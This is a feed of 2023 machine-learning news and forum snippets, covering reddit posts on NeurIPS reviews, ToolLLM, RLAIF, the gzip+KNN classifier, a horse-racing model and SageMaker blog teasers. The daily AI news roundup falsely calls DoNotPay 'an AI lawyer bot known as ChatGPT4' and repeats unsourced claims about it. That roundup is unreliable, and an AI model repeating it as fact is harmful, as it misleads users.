    [D] NeurIPS 2023 Paper Reviews
    NeurIPS 2023 paper reviews are visible on OpenReview. See this tweet. I thought to create a discussion thread for us to discuss any issue/complain/celebration or anything else. There is so much noise in the reviews every year. Some good work that the authors are proud of might get a low score because of the noisy system, given that NeurIPS is growing so large these years. We should keep in mind that the work is still valuable no matter what the score is. submitted by /u/zy415 [link] [comments]  ( 8 min )
    [R] ToolLLM: Facilitating Large Language Models to Master 16000+ Real-world APIs - WeChat AI, Tencent Inc. 2023 - Open-source! Comparble performance to ChatGPT while using tools!
    Paper: https://arxiv.org/abs/2307.16789 Github: https://github.com/OpenBMB/ToolBench Abstract: Despite the advancements of open-source large language models (LLMs) and their variants, e.g., LLaMA and Vicuna, they remain significantly limited in performing higher-level tasks, such as following human instructions to use external tools (APIs). This is because current instruction tuning largely focuses on basic language tasks instead of the tool-use domain. This is in contrast to state-of-the-art (SOTA) LLMs, e.g., ChatGPT, which have demonstrated excellent tool-use capabilities but are unfortunately closed source. To facilitate tool-use capabilities within open-source LLMs, we introduce ToolLLM, a general tool-use framework of data construction, model training and evaluation. We first …  ( 9 min )
    [P] - VkFFT version 1.3 released - major design and functionality improvements
    Hello, I am the creator of the VkFFT - GPU Fast Fourier Transform library for Vulkan/CUDA/HIP/OpenCL/Level Zero and Metal. FFTs are used by many algorithms, not only for signal processing. For example, you can efficiently calculate convolutions with them, which has applications in CNNs and feature generation. I used to post on the latest features implemented in the codebase and there has been a major update released today. It brings: -Major library design change - from single header to multiple header approach, which improves structure and maintainability. Now instead of copying a single file, the user has to copy the vkFFT folder contents. -VkFFT has been rewritten to follow the multiple-level platform structure, described in the VkFFT whitepaper. All algorithms have been split into res…  ( 9 min )
    [P] dora-rs: experimental ROS2 alternative up to 17x faster for Python API, making more robotics accessible for AI users
    https://github.com/dora-rs/dora submitted by /u/haixuanxaviertao [link] [comments]  ( 8 min )
    [D] Reinforcement Learning from AI Feedback
    Hey everyone, As many of you probably know Reinforcement Learning from Human Feedback (RLHF) was the core technique used to produce ChatGPT and similar AI assistants that followed. RLHF replaces human feedback in an RL schema with a preference model that is trained according to a dataset of human preferences. Anthropic has devised an extension of this idea in which an AI model (rather than humans) is used to generate the data which ultimately trains the preference model. This method, called Reinforcement Learning from AI Feedback uses a "constitution" to guide the feedback model in terms of what outputs are preferable to others. I go over the research in How Reinforcement Learning from AI Feedback Works. In short, the authors find that they are able to train a non-evasive harmless agent using a short constitution. The method is found to be superior to RLHF, and constitutes a Pareto improvement over RLHF models. https://preview.redd.it/qaivl8f1ljfb1.png?width=1179&format=png&auto=webp&s=a0941f2ce0ccdcf0557cf19b7f4b48fa712a66f2 Let me know what you think, I'm happy to answer any questions! submitted by /u/SleekEagle [link] [comments]  ( 9 min )
    [R] Any ML professionals mind helping out with an academic survey?
    Hi there, First off, apologies if this kind of post isn't allowed. I tried messaging the mods in advance, but didn't get a reply. Of course feel free to delete if it's not. I'm an academic at the University of Cambridge's Computer Lab, and I'm looking to get some insights from people that work with algorithmic systems (e.g. ML systems) in a professional capacity. The aim of the research is to document some of the approaches, attitudes, and challenges associated with record-keeping for these types of systems, and write them up for an academic conference. If you're a professional working with algorithmic/ML systems, and happen to have a spare ~20 minutes, would you mind answering some questions? The link to the questionnaire is here: https://cambridge.eu.qualtrics.com/jfe/form/SV_3n6RuowNogZKG34 Thanks very much! I'd be more than happy to come back and share the results/paper here if that's of interest to people? submitted by /u/cnorval [link] [comments]  ( 9 min )
    [Project] GZip+KNN Official Package Released
    The official python package for the "'Low-Resource' Text Classification: A Parameter-Free Classification Method with Compressors" has now been released on pypi: npc-gzip v0.1.0 Abstract: Deep neural networks (DNNs) are often used for text classification due to their high accuracy. However, DNNs can be computationally intensive, requiring millions of parameters and large amounts of labeled data, which can make them expensive to use, to optimize, and to transfer to out-of-distribution (OOD) cases in practice. In this paper, we propose a non-parametric alternative to DNNs that’s easy, lightweight, and universal in text classification: a combination of a simple compressor like gzip with a k-nearest-neighbor classifier. Without any training parameters, our method achieves results that are competitive with non-pretrained deep learning methods on six in-distribution datasets.It even outperforms BERT on all five OOD datasets, including four low-resource languages. Our method also excels in the few-shot setting, where labeled data are too scarce to train DNNs effectively. This paper has made some waves on this subreddit and in the community in general over the last 2 weeks. We've seen the bugs around training/testing data leakages and varying claims in accuracy. Our hope with this package is to get the code into everyone's hands first to solve whatever use case you currently have for this technology and second to make the code more readily available for additional community testing. Links: * https://pypi.org/project/npc-gzip/ * https://github.com/bazingagin/npc_gzip * https://aclanthology.org/2023.findings-acl.426/ submitted by /u/dfcHeadChair [link] [comments]  ( 9 min )
    [D] Google updates "Attention is all you need" paper with a warning + crossed authors
    submitted by /u/Jean-Porte [link] [comments]  ( 8 min )
    [R] Probabilistic Imputation for Time-series Classification with Missing Data
    This is one of the ICML 2023 papers I focused in on in a sea of LLM stuff. Trying to figure out simple ways to implement this and adapt it to regression problems. Thoughts? submitted by /u/quantthrowaway69 [link] [comments]  ( 8 min )
    [P] Video-to-Text model descriptive style (not subtitles)
    I was wondering if there's already something like CLIP (the model that looks at an image and describes it), but for videos. So you show a video of, say, a dog jumping and grabbing a tennis ball and it outputs "dog grabbing a tennis ball", something like that. My first thought was object detection, and input that interaction of the objects (tennis ball, dog) to the model with the target being "dog grabbing tennis ball". My ultimate goal being real-time description for, say, sports casting. I'm sure something like this is what cars use to drive themselves, or not? Any info is appreciated! submitted by /u/Yip37 [link] [comments]  ( 9 min )
  • Open

    What do simulations mean in the context of the AlphaGoZero paper?
    Can someone please help me with this question? Please let me know if any clarification is needed. Thanks so much! submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    Drone for Research
    I'm currently working on a research project that involves using deep reinforcement learning with drones. I'm looking for recommendations on drones that would be suitable for this type of research. I am looking for something of the shelf. submitted by /u/anointedninja [link] [comments]  ( 8 min )
    Making a reinforcement learning code(in python) that can play a game with visual data only.
    So i want to make a bot that can play a game with only the visual data and no other fancy stuff. I did manage to get all the data i need (i hope) using a code that uses open-cv to get data in real time Example:Player: ['Green', 439.9180603027344, 461.7232666015625, 13.700743675231934] Enemy Data {0: [473.99951171875, 420.5301513671875, 'Green', 20.159990310668945]} Box: {0: [720, 605, 'Green_box'], 1: [957, 311, 'Green_box'], 2: [432, 268, 'Red_box'], 3: [1004, 399, 'Blue_box']} can anyone suggest a way to make one. Rules: - You can only move in the direction of mouse. -You can dash in direction of mouse by LMB. -You can collect boxes to get HP and change colors. -Red color kills Blue kills Green Kills Red. -There is a fixed screen. -You lose 25% of total HP when you dash. -You lose 50% of HP when you bump into players (of color that kills or there HP is > than you. ​ Visualization of Data. submitted by /u/SIJ_Gamer [link] [comments]  ( 9 min )
  • Open

    DSC Weekly 1 August 2023
    Announcements Top Stories In-Depth The post DSC Weekly 1 August 2023 appeared first on Data Science Central.  ( 19 min )
    I bet you think this article is about ChatGPT
    Generative AI has been around for a long time. Some sources say that it appeared as early as the 1950’s. Other sources point to the first rudimentary chatbots that were introduced in the 1960’s. Whatever the true point of origin, we can all agree that those were small pebbles on the historical timeline compared to… Read More »I bet you think this article is about ChatGPT The post I bet you think this article is about ChatGPT appeared first on Data Science Central.  ( 22 min )
    Data tribalism and the AI nuance deficit
    If I could name one reason why business will face at least one more AI winter, it’s the lack of nuance in most business AI discussions. The buzz about large language models (LLMs) has sucked much of the oxygen out of the air for complementary technologies. The truth is that LLMs are no more a… Read More »Data tribalism and the AI nuance deficit The post Data tribalism and the AI nuance deficit appeared first on Data Science Central.  ( 20 min )
    DSC Webinar Series: Influence Data-Driven Decisions Based On Your Communication Style
    The post DSC Webinar Series: Influence Data-Driven Decisions Based On Your Communication Style appeared first on Data Science Central.  ( 17 min )
    The Rise of the Dual Data Scientist / Machine Learning Engineer
    There are thousands of articles explaining the differences between data scientist and machine learning engineer. Data science gets broken down even further, with data analysts contrasted to researchers. Professionals skilled in all these domains are called unicorns and believed not to exist. Indeed, they may not work for companies, and ignored when applying for a… Read More »The Rise of the Dual Data Scientist / Machine Learning Engineer The post The Rise of the Dual Data Scientist / Machine Learning Engineer appeared first on Data Science Central.  ( 21 min )
  • Open

    [Discussion] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. I was wondering what other resources you guys have used that you would recommend that emphasize deep reinforcement learning for someone with some experience in shallow/classical reinforcement learning already and some experience with deep learning already, but new to deep reinforcement learning submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/1/2023
    DoNotPay, an AI lawyer bot known as ChatGPT4, is transforming how users handle legal issues and save money. In under two years, this innovative robot has successfully overturned more than 160,000 parking tickets in cities like New York and London. Since its launch, it has resolved a total of 2 million related cases.[1] Microsoft hints Windows 11 Copilot with third-party AI plugins is almost here.[2] In an analyst note on Tuesday, the financial services arm of Swiss banking giant UBS raised its guidance for long-term AI end-demand forecast from 20% compound annual growth rate (CAGR) from 2020 to 2025 to 61% CAGR between 2022 to 2027.[3] The next generation of the successful OpenAI language model is already on the way. It has been discovered that the North American company has filed a registration application for the GPT-5 mark with the United States Patent and Trademark Office.[4] Sources: [1] https://citylife.capetown/uncategorized/donotpay-ai-bot-saves-users-money-by-overturning-parking-tickets-and-more/302279/ [2] https://www.itvoice.in/microsoft-hints-windows-11-copilot-with-third-party-ai-plugins-is-almost-here [3] https://venturebeat.com/ai/ubs-projects-61-compound-annual-growth-rate-for-ai-between-2022-and-2027/ [4] https://www.gearrice.com/update/openai-confirms-gpt-5-and-gives-us-the-first-clues-about-it/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Facts & Narratives: AI 'Not a Threat to Humanity'
    submitted by /u/Jane-in-the-jungle [link] [comments]  ( 8 min )
    Is there an AI similar to ChatGPT that I can upload an image to and it understands and describes it for me?
    Other features might include: - searching the web for the same or similar image - basing the chat prompt off the image submitted by /u/Maelasae [link] [comments]  ( 8 min )
    AI tattoo?
    i wanted to ask the AI experts for any tattoo ideas, anything like a symbol or word, something unique that represents AI, i was thinking of a CPU but thats a bit meh and not really a symbol, let me know :) submitted by /u/Equivalent-You5810 [link] [comments]  ( 8 min )
    My fellow innovators, I've created something truly revolutionary, born from the depths of my own frustrations
    As a web developer, I was constantly tired of switching between tabs just to translate a word or two, or to get a quick answer to a burning question from AI. The constant back-and-forth was draining my time and energy. So, I took matters into my own hands and developed a Chrome extension that allows you to get an answer from AI without ever leaving the comfort of your current tab, and specifically - the comfort of your current text field. It may seem like a simple solution, but trust me - it's a game-changer when trying to save time and energy. Assuming that there's a chance some of you might be experiencing the same frustration, I'd like to share this tool with you. For anyone thinking: "Wait, but there are already tools that let you use AI inside the current browser tab" - yeah, there are. BUT can they scrape website data from a simple URL in order to get context for the response? Can other tools read PDFs? Do these tools let you control every setting to the smallest detail? Probably not. Well this tool does let you do all that. You can find it on Chrome store as "Wou AI" Let me know how it works out for you, and I would greatly appreciate any feedback or suggestions for future functions. submitted by /u/MantasDigital [link] [comments]  ( 9 min )
    What can Socrates teach us about AI and prompting?
    submitted by /u/simsirisic [link] [comments]  ( 8 min )
    Review my AI Self Portraits Book!
    I'm looking for reviewers for my book, "AI Self Portraits" which is coming out on Amazon on the 21st. I might even put your quote on the back cover! ​ https://preview.redd.it/cqmp1ggllhfb1.png?width=1024&format=png&auto=webp&s=cc7c087f7c2be103b53f2014acd991c947e6cb7f ​ submitted by /u/KarneyHatch [link] [comments]  ( 8 min )
    TFJS Format vs. TFLite
    After analyzing 15,000 samples in the dataset, we noticed that increasing the number of images doesn't significantly improve the scoreboard recognition quality for our neural network. However, what's more interesting is how the network performs in different formats. When deployed in TFJS format on a website, it often behaves strangely, detecting objects where there are none. On the other hand, in TFLite format, such failures are almost non-existent. https://preview.redd.it/fedfa8lzchfb1.jpg?width=700&format=pjpg&auto=webp&s=850526791a75465e267afbed6ac1bc119b9ae6ae If you access the link on your mobile phone and grant camera permission, you'll witness the neural network (in TFJS format) attempting to find objects even when there are none. ​ submitted by /u/moseich [link] [comments]  ( 8 min )
    AI For Youtube Video Transcript
    I was Wondering If There is an AI Software, Smart enough That Can Give Excellent Quality Transcript if i give the link of a youtube video. Basically the Feature i am Looking For Should be The Ability to Detect The Narrator And Speaker By Names ( Not SPeaker 1, 2 etc ). Would really appreciate your help as my own search has led me to a dead-end. submitted by /u/Richie_Boy_ [link] [comments]  ( 8 min )
    How are people getting A.I. voices of Resident Evil Characters?
    How do channels like TriggerHappy Productions and WeskerandFriends get the A.I. voices of all these Resident Evil characters? submitted by /u/Conscious-Theory-850 [link] [comments]  ( 8 min )
  • Open

    Exploring summarization options for Healthcare with Amazon SageMaker
    In today’s rapidly evolving healthcare landscape, doctors are faced with vast amounts of clinical data from various sources, such as caregiver notes, electronic health records, and imaging reports. This wealth of information, while essential for patient care, can also be overwhelming and time-consuming for medical professionals to sift through and analyze. Efficiently summarizing and extracting […]  ( 13 min )
    Unlocking creativity: How generative AI and Amazon SageMaker help businesses produce ad creatives for marketing campaigns with AWS
    Advertising agencies can use generative AI and text-to-image foundation models to create innovative ad creatives and content. In this post, we demonstrate how you can generate new images from existing base images using Amazon SageMaker, a fully managed service to build, train, and deploy ML models for at scale. With this solution, businesses large and […]  ( 8 min )
  • Open

    Cuddly 3D Creature Comes to Life in Father-Son Collaboration This Week ‘In the NVIDIA Studio’
    Principal NVIDIA artist and 3D expert Michael Johnson creates highly detailed art that’s both technically impressive and emotionally resonant.  ( 6 min )
    NVIDIA Helps Forge Forum to Set OpenUSD Standard for 3D Worlds
    NVIDIA joined Pixar, Adobe, Apple and Autodesk today to found the Alliance for OpenUSD, a major leap toward unlocking the next era of 3D graphics, design and simulation. The group will standardize and extend OpenUSD, the open-source Universal Scene Description framework that’s the foundation of interoperable 3D applications and projects ranging from visual effects to Read article >  ( 6 min )
  • Open

    TFJS Format vs. TFLite
    After analyzing 15,000 samples in the dataset, we noticed that increasing the number of images doesn't significantly improve the scoreboard recognition quality for our neural network. However, what's more interesting is how the network performs in different formats. When deployed in TFJS format on a website , it often behaves strangely, detecting objects where there are none. On the other hand, in TFLite format, such failures are almost non-existent. If you access the link on your mobile phone and grant camera permission, you'll witness the neural network (in TFJS format) attempting to find objects even when there are none. https://preview.redd.it/gosobymachfb1.jpg?width=585&format=pjpg&auto=webp&s=e7cb8e8e3ff49e39715009c4940d9769a1db39ab submitted by /u/moseich [link] [comments]  ( 8 min )
  • Open

    Confidence-Building Measures for Artificial Intelligence: Workshop proceedings
    No content preview  ( 2 min )

  • Open

    Up-down permutations
    An up-down permutation of an ordered set is a permutation such that as you move from left to right the permutation alternates up and down. For example 1, 5, 3, 4, 2 is an up-down permutation of 1, 2, 3, 4, 5 because 1 3 2. Up-down permutations are […] Up-down permutations first appeared on John D. Cook.  ( 5 min )
    Variance of binned data
    Suppose you have data that for some reason has been summarized into bins of width h. You don’t have the original data, only the number of counts in each bin. You can’t exactly find the sample mean or sample variance of the data because you don’t actually have the data. But what’s the best you […] Variance of binned data first appeared on John D. Cook.  ( 5 min )
    Ancient estimate of π and modern numerical analysis
    A very crude way to estimate π would be to find the perimeter of squares inside and outside a unit circle. The outside square has sides of length 2, so 2π < 8. The inside square has sides of length 2/√2, so 8/√2 < 2π. This tells us π is between 2.82 and 4. Not […] Ancient estimate of π and modern numerical analysis first appeared on John D. Cook.  ( 6 min )
  • Open

    LLM models for interpreting tables and charts [D]
    Hi all, Curious if anyone has recommendations on models to use to interpret the data in tables? I'm playing around with Google's Matcha model, which performs fine. seems like extracting the data out of a table and asking GPT4 to analyze it performs a bit better but requires extra steps. I'm specifically not looking to interpret graphs, but rather tables. e.g., can i ask the model to identify if there are any errors in the table / any data points that don't tie if the rows are supposed to sum up. submitted by /u/eyeronthrone [link] [comments]  ( 8 min )
    [N] Conference Codes
    I'll likely be downvoted to hell but here goes: Prices for The AI Conference double at midnight Pacific. 46 Speakers, 10+ topics, 2 Days plus a hackathon at night! Join us to learn and collaborate with scientists, engineers and founders from the top AI companies and projects. Speakers include: Ben Mann | Co-Founder | Anthropic Peter Norvig | Director of Research | Google Nazneen Rajani | Research Lead | Hugging Face Igor Markov | Research Scientist | Meta Bryan Catanzaro | VP Of Research | Nvidia Ram Sriharsha | VP of Engineering and R&D | Pinecone Jerry Liu | Co-founder | LlamaIndex Harrison Chase | Co-founder | LangChain Alex Chao | Product Manager Semantic Kernel | Microsoft See All Speakers Last chance to get in on early bird pricing (save $400 on a 2 day pass). If you can read this and I'm not downvoted to hell, use discount code redditlove for 25% off. Use discount code "student" for $200 student tickets \*Must Use EDU email to register* **This is my event and therefore self-promotion ​ ​ submitted by /u/shonburton [link] [comments]  ( 9 min )
    [D] Where did all the ML research go?
    For the past several years this subreddit has been my favorite source to keep up with new, interesting ideas and research from all over the field. It's great to have a way to break out of my own insular research bubble and spread out a bit more. Unfortunately, it looks like that era has passed. The sub has been seemingly shifting away from research in the past 1-2 years. Whenever research is posted, it is almost always LLM based with very little variety (considering the plethora of research areas in ML). I don't mean to assert that this is a bad thing, as the constant upvotes indicate that there is a high demand for LLM projects and research. Heck, I'm also interested in lots of the recent work with LLMs, and I plan to keep up with it – but I also would also love a venue with a diversity of ideas and topics. Machine learning is a HUGE field, and only focusing on a small subset of it seems like a waste. I don't mean to rant, but rather to ask: are there any other subreddits like this, or perhaps, any other active communities with a broader scope? Or if this doesn't exist, is there a demand for it? Or is it just me? submitted by /u/ejmejm1 [link] [comments]  ( 9 min )
    [D] elasticsearch HNSW python implementation
    Is there any documentation available which will help in implementing elasticsearch HNSW ANN search in python? I've searched a lot but i cant find anything in official documentation too Any help will be appreciated. TIA submitted by /u/adiraat [link] [comments]  ( 8 min )
    Why CUDA 11.7? Can more recent versions of CUDA be used? Is this a PyTorch limitation? [D]
    Everyone always seems to use CUDA 11.7. Is there a reason for this? What is the factor that limits the CUDA version used? Are there any speed/efficiency advantages to using a more recent version of CUDA, such as CUDA 12.0? What exactly is the limiting factor here, PyTorch? I've looked in the PyTorch docs but I don't see where the CUDA version is defined. Where can I find the maximum CUDA version I can use with the latest (or any given) PyTorch version? Thanks! submitted by /u/Pan000 [link] [comments]  ( 8 min )
    [D] Model design for outputting reliable multiclass probabilities
    Hey guys, I am working on a horse racing model to identify the probabilities of each horse winning a race. I currently have a feed forward NN with a final SOFTMAX layer to simulate probabilities of each horse winning using cross-entropy loss. My plan here being that if the model outputs, [0.05, 0.4, 0.2, 0.15, 0.2] then horses 1-5 have the corresponding probability of winning. The model has been trained like a regular classification task where the target is a one-hot vector describing the winner. Unlike previous work I have done where SOFTMAX output lends itself to some "confidence" score, this task requires that the model outputs be indicative of probabilities. My concern is that experientially, NNs tend to be overconfident with their answers in this type of setting. However, I wish to keep using a NN as each race datapoint has around 3k features - did not find good results with XGBoost. Any good practices for modelling probabilities in this sort of scenario? For context, the probability of a horse winning is what sets the odds for that horse. submitted by /u/HStuart18 [link] [comments]  ( 9 min )
    [D] Running Free Willy / stable baluga 2
    I was wondering if anyone knows how difficult it is to set up a server to run the 70B llama / llama 2 variants like these top ones on the hugging face leaderboard https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard What type of gpu would I need to set it up? Would the high ram t4 you get with Google colab+ be enough or does it require more power / space? Thanks in advance! submitted by /u/Additional_Elk4745 [link] [comments]  ( 8 min )
    [R] Attention over pre-trained Sentence Embeddings for Long Document Classification
    Article available here: https://arxiv.org/pdf/2307.09084.pdf Thoughts? submitted by /u/MuffinB0y [link] [comments]  ( 8 min )
    [P] Apple - Fruit = X? Combine Queries and Explore CLIP Embedding Space With rclip
    Hi. I've shipped an update to my rclip – a command-line photo search tool powered by CLIP. Now, you can add and subtract image and text queries from each other; here are a few usage examples: cd photos && rclip horse + stripes cd photos && rclip apple - fruit cd photos && rclip "./new york city.jpg" + night cd photos && rclip "2:golden retriever" + "./swimming pool.jpg" cd photos && rclip "./racing car.jpg" - "2:sports car" + "2:snow" If you want to see how these queries perform when executed on the 1.28 million images ImageNet-1k dataset, check out the demo on YouTube: https://www.youtube.com/watch?v=MsTgYdOpgcQ. rclip source code is published on GitHub under the MIT license and offers a pre-build distributable for Linux (installation instructions are in the README): https://github.com/yurijmikhalevich/rclip. Give it a try and let me know what you think! submitted by /u/39dotyt [link] [comments]  ( 9 min )
    [D] Open Source Model Combination To Turn Images -> LLM?
    Im trying to research into open source text models [like Llama] and image models [like Stable Diffusion]. My goal is to give the model(s) a picture of birds and bees, then ask it to "circle" the bees. The idea is, when given an image, it would produce coordinates on that image where the line should be circled. It could also represent where it should "click" on all the bees. Does something like this exist? submitted by /u/MindWithEase [link] [comments]  ( 8 min )
    Open Problems and Fundamental Limitations of Reinforcement Learning from Human Feedback
    submitted by /u/Working_Ideal3808 [link] [comments]  ( 8 min )
    [P] Pair programming my website with an AI developer
    submitted by /u/williamsweep [link] [comments]  ( 8 min )
  • Open

    [Reinforcement Learning: an Introduction (2nd edition)] Why not the joint distribution for equations 3.5 and 3.6?
    Greetings! I'm going through the initial equations that define most of the theoretical framework for the specialization. One curious thing I noticed with equations 3.5 and 3.6 is that they use the conditional distribution p(s′,r∣s,a) without including any priors. I'm talking about priors because, unless I'm missing something huge, the definition of the expected value for the reward (for both 3.5 and 3.6) should use the joint distribution for all 4 dimensions (next state, reward, current state, action). From that joint distribution, we can factorize it to show p(s′,r∣s,a). For example, one factorization that seems to make sense for this kind of model is p(s′,r,s,a) = p(s′,r∣s,a) ⋅ p(s) ⋅ p(a) which would turn, for example, equation 3.5 into r(s,a) = ∑​ ∑ ​r ⋅ p(s′,r∣s,a) ⋅ p(s) ⋅ p(a) (Note: the two sums are for "r" and "s' ". I wrote like that because I don't know write it in Latex or similar...) What am I missing? Is it because s and a are given as parameters of the function r(s,a) meaning that p(s) = p(a) = 1? If the factorization above is the right one for those equations, is this the only factorization used in the entire book? Thanks in advance! submitted by /u/SupBiebi [link] [comments]  ( 9 min )
    [Discussion] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. I was wondering what other resources you guys have used that you would recommend that emphasize deep reinforcement learning for someone with some experience in shallow/classical reinforcement learning already and some experience with deep learning already, but new to deep reinforcement learning submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    What are some big action space MARL stochastic games implemented in OpenSpiel or equivalent?
    Are there big action space stochastic games that are implemented in OpenSpiel or equivalent? I played around Markov soccer game a lot but it's solvable with tabular methods and I was looking for games with at least more than 500 actions both players can take as a testbed for more complicated action spaces? submitted by /u/Potential_Biscotti14 [link] [comments]  ( 8 min )
    Optimal Bidding Strategy in Power Market using Reinforcement Learning
    Hello everyone! I'm trying to use reinforcement learning to solve a problem in the power market. The problem is about finding the best strategy for bidding on electricity for each hour of the day, considering both buying and selling options. Let's say we have a generator that can produce up to 800MW of electricity per day, and it can be charged up to 200MW per hour. After charging it for 4 hours continuously, it reaches its maximum capacity, and we can't charge more until we discharge some electricity. We have access to data from the past 5 years, including information about temperature, hydro, gas prices, and locational marginal price, which is important for determining profit. For instance, if we buy 10MW of electricity for a specific hour, our profit for that hour is 10 times the locational marginal price. The goal is to maximize profit at the end of the day while making sure that the total electricity bought and sold is equal for all days. This means we want to avoid wasting electricity. I initially tried using deep Q-learning, where the agent's state consists of data from the past 3 days, and the agent can take actions to buy or sell a certain amount of electricity for one hour. However, this approach doesn't seem to provide accurate results, and it works step by step, not considering the overall outcome for the whole day. So, I'm looking for help on how to build an agent capable of producing 24 bids for 24 hours, considering the constraints of the generator's capacity and ensuring no waste of electricity. I'm new to reinforcement learning, and I'm not sure how to approach this complex problem. Any guidance would be greatly appreciated! submitted by /u/uonliaquat [link] [comments]  ( 9 min )
    Looking for old tutorial series
    A few years ago, I remember reading a multipart series of articles/blog posts explaining how to develop agents for classical games. I believe the series started with tic-tac-toe and definitely progressed to gomoku, before maybe moving on to more complex games. I think there was more of a focus on algorithms (maybe MCTS) and concepts than code. It's a long shot, but does anyone recall this series or know if it's archived somewhere? seems like it might have been taken down. Wasn't on Medium. I think it might've been a personal website. I vaguely remember a green UI theme? submitted by /u/nothymn [link] [comments]  ( 8 min )
  • Open

    Is image generation or text generation more impactful?
    Curious what people's stance on this is. Why? View Poll submitted by /u/philippemnoel [link] [comments]  ( 8 min )
    State of AI security.
    submitted by /u/Philipp [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/31/2023
    Deutsche Telekom, e&, SK Telecom (SKT), and Singtel penned an agreement to form a global telecoms AI alliance designed to use the technology to unlock new business opportunities and accelerate industry growth.[1] Influencers Lil Miquela, Imma, and supermodel Shudu have raked in millions from deals with fashion giants such as Dior, Calvin Klein, Chanel, and Prada. But these shiny celebrities all have one thing in common — not one of them is real.[2] Google’s chatbot Bard reveals the jobs most at risk of artificial intelligence with truck drivers and data entry clerks on the list – while teachers and lawyers are among the safest careers.[3] DoorDash Inc., the US food-delivery service that competes with Uber Technologies Inc. and GrubHub, is looking to speed up ordering and help customers find food options with an artificial intelligence-based chatbot.[4] Sources: [1] https://www.mobileworldlive.com/featured-content/home-banner/global-operator-giants-launch-ai-alliance/ [2] https://www.the-sun.com/tech/8725778/ai-influencers-fashion-deals/ [3] https://www.dailymail.co.uk/news/article-12354605/googles-AI-bard-predicts-jobs-risk.html [4] https://www.bloomberg.com/news/articles/2023-07-27/doordash-is-working-on-an-ai-chatbot-to-speed-up-food-ordering?in_source=embedded-checkout-banner submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Build protein folding workflows to accelerate drug discovery on Amazon SageMaker
    Drug development is a complex and long process that involves screening thousands of drug candidates and using computational or experimental methods to evaluate leads. According to McKinsey, a single drug can take 10 years and cost an average of $2.6 billion to go through disease target identification, drug screening, drug-target validation, and eventual commercial launch. […]  ( 15 min )
    Is your model good? A deep dive into Amazon SageMaker Canvas advanced metrics
    If you are a business analyst, understanding customer behavior is probably one of the most important things you care about. Understanding the reasons and mechanisms behind customer purchase decisions can facilitate revenue growth. However, the loss of customers (commonly referred to as customer churn) always poses a risk. Gaining insights into why customers leave can […]  ( 14 min )
  • Open

    Doctor AI: Healing humans and mother earth hand in hand
    Let’s image – with algorithms and a nerdy charm that could melt any data center, an ‘AI’ wearing lab coats and stethoscopes patrolling hospital hallways, tirelessly monitoring patients. The digital doctor will take the pulse of Mother Earth and reduce waste, cut energy consumption, and cut energy consumption! The artificial intelligence community is well aware… Read More »Doctor AI: Healing humans and mother earth hand in hand The post Doctor AI: Healing humans and mother earth hand in hand appeared first on Data Science Central.  ( 20 min )
    Increase efficiency of manufacturing operations with IoT solutions
    In an age where efficiency is king, manufacturing firms are in a constant race to outshine their competition. Imagine if you could boost productivity, slash downtime, and cut costs all at once. Sounds like a dream, right? The good news is, this isn’t a fantasy. It’s achievable through Internet of Things (IoT) solutions. IoT solutions… Read More »Increase efficiency of manufacturing operations with IoT solutions The post Increase efficiency of manufacturing operations with IoT solutions appeared first on Data Science Central.  ( 21 min )
    Human-centered data networking with interpersonal knowledge  graphs
    “If you start by creating your data, then it’s like you are piling up some value or you’re creating some assets,” WordLift CEO Andrea Volpini told me in our recent FAIR Data Forecast interview. Volpini’s an advocate for adding structured data such as Schema.org to your content. That way, the content becomes logically connected and… Read More »Human-centered data networking with interpersonal knowledge  graphs The post Human-centered data networking with interpersonal knowledge  graphs appeared first on Data Science Central.  ( 21 min )
  • Open

    Interview with Hikaru Shindo and Quentin Delfosse: Neurosymbolic Reinfor...
    submitted by /u/Neurosymbolic [link] [comments]  ( 8 min )
  • Open

    Using AI to protect against AI image manipulation
    “PhotoGuard,” developed by MIT CSAIL researchers, prevents unauthorized image manipulation, safeguarding authenticity in the era of advanced generative models.  ( 10 min )

  • Open

    [R] Towards robust production machine learning for software systems - Survey
    Could you please help us get more responses for this study? As part of my PhD research project at Applied Artificial Intelligence Institute of Deakin University, we are investigating the challenges that software engineers face when working with machine learning (ML) models in production. Moreover, we explore how to enhance our proposed solution to better meet the needs of these engineers. ​ The objective of this study is to pinpoint the areas where software engineers need more support and resources to effectively work with ML components in production. It also aims to evaluate the effectiveness of a proposed protocol to improve software engineers' productivity and enable them to work more effectively with ML components in production environments. ​ With the knowledge gained from this i…  ( 9 min )
    [D] Number of epochs for a BERT based model
    Hello everyone. I am trying to replace the GloVe embeddings based model outlined in this paper by BERT embeddings. The authors of the paper have trained their model for 250 epochs, which for what I am doing is not feasible. I was wondering what would be the recommended number of epochs I should run the BERT model for? I know it is a pretty open ended question, but I was looking to get the community's view on how much epochs should a BERT based model be trained for. Any information will be much appreciated. submitted by /u/nocturnal_1_1995 [link] [comments]  ( 9 min )
    [N] AI Usage Fees Up to 15x Cheaper for English Than Other Languages
    submitted by /u/geekinchief [link] [comments]  ( 8 min )
    [D] Alternatives to HF or a path forward for the OSS community?
    I think it’s clear that Hugging Face is not aligned to the OSS community any more and it’s only going to get worse over the next few years. What are the top alternatives or where should the OSS contributors go? I’m trying to think ahead to what libraries we should rely on and contribute to. Anyone else have this as a worry? https://twitter.com/untitled01ipynb/status/1685667451197878272 submitted by /u/homunculAI [link] [comments]  ( 8 min )
    [R] Compressing vision-language and unimodal Transformers via structured pruning
